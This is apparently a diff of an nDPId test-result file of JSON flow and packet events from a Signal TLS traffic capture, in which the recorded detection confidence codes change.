00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
-00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569051248547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051248547,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTAAAP8RkXUAAAAA\/\/\/\/\/wBEAEMBNJw9AQEGACG6jqoABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569051253252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051253252,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTEAAP8RkXQAAAAA\/\/\/\/\/wBEAEMBNJw4AQEGACG6jqoACQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 
